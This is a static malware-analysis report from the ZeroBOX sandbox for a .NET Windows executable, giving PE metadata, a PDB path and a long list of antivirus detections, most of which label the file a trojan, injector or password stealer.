Static | ZeroBOX

PE Compile Time

2102-08-16 22:48:44

PDB Path

C:\Users\janad\Desktop\encrypt c# payload\download and run\WindowsFormsApp3\obj\Debug\WindowsFormsApp3.pdb

PE Imphash

f34d5f2d4577ed6d9ceec516c1f5a744

Sections

Name    Virtual Address  Virtual Size  Size of Raw Data  Entropy
.text   0x00002000       0x00002e80    0x00003000        5.77684362053
.rsrc   0x00006000       0x000005ec    0x00000600        4.19296841781
.reloc  0x00008000       0x0000000c    0x00000200        0.0815394123432

Resources

Name         Offset      Size        Language      Sub-language     File type
RT_VERSION   0x00006090  0x0000035c  LANG_NEUTRAL  SUBLANG_NEUTRAL  data
RT_MANIFEST  0x000063fc  0x000001ea  LANG_NEUTRAL  SUBLANG_NEUTRAL  XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

Imports

Library mscoree.dll:
0x402000 _CorExeMain

Antivirus Signature
Bkav W32.AIDetectMalware.CS
Lionic Trojan.Win32.Generic.4!c
Elastic malicious (high confidence)
MicroWorld-eScan Trojan.GenericKD.70689014
CMC Clean
CAT-QuickHeal Clean
Skyhigh Clean
ALYac Trojan.GenericKD.70689014
Malwarebytes Spyware.PasswordStealer
VIPRE Trojan.GenericKD.70689014
Sangfor Suspicious.Win32.Save.a
K7AntiVirus Trojan ( 700000121 )
BitDefender Trojan.GenericKD.70689014
K7GW Trojan ( 700000121 )
Cybereason malicious.cf0cbb
Arcabit Trojan.Generic.D436A0F6
Baidu Clean
VirIT Clean
Symantec ML.Attribute.HighConfidence
tehtris Clean
ESET-NOD32 a variant of MSIL/Injector.FCD
Cynet Malicious (score: 99)
APEX Malicious
Paloalto Clean
ClamAV Clean
Kaspersky HEUR:Trojan.Win32.Generic
Alibaba Trojan:MSIL/Injector.5669fb4a
NANO-Antivirus Clean
ViRobot Trojan.Win.Z.Marsilia.14848.B
Rising Backdoor.Orcus!8.A4F3 (CLOUD)
TACHYON Clean
Sophos Mal/MSIL-AX
F-Secure Trojan.TR/Dropper.Gen
DrWeb Trojan.InjectNET.67
Zillya Clean
TrendMicro TROJ_GEN.R002C0RL423
Trapmine Clean
FireEye Generic.mg.716c27c08649ad53
Emsisoft Trojan.GenericKD.70689014 (B)
Ikarus Trojan-Spy.LokiBot
Jiangmin Clean
Webroot W32.Trojan.GenKD
Varist W32/ABRisk.JDCR-7110
Avira TR/Dropper.Gen
Antiy-AVL Trojan/MSIL.Injector
Kingsoft Win32.Trojan.Generic.a
Gridinsoft Trojan.Win32.AgentTesla.tr
Xcitium Malware@#1gcair6cfiqjs
Microsoft Trojan:Win32/Znyonm
SUPERAntiSpyware Clean
ZoneAlarm HEUR:Trojan.Win32.Generic
GData Trojan.GenericKD.70689014
Google Detected
AhnLab-V3 Trojan/Win32.RL_Generic.C4274416
Acronis Clean
McAfee Clean
MAX malware (ai score=88)
DeepInstinct MALICIOUS
VBA32 TScope.Trojan.MSIL
Cylance unsafe
Panda Trj/GdSda.A
Zoner Clean
TrendMicro-HouseCall TROJ_GEN.R002C0RL423
Tencent Malware.Win32.Gencirc.13f8f9d1
Yandex Clean
SentinelOne Static AI - Malicious PE
MaxSecure Trojan.Malware.7164915.susgen
Fortinet W32/FCD!tr
BitDefenderTheta Gen:NN.ZemsilF.36608.am0@a4Jam1
AVG Win32:InjectorX-gen [Trj]
Avast Win32:InjectorX-gen [Trj]
CrowdStrike win/malicious_confidence_100% (W)
No IRMA results available.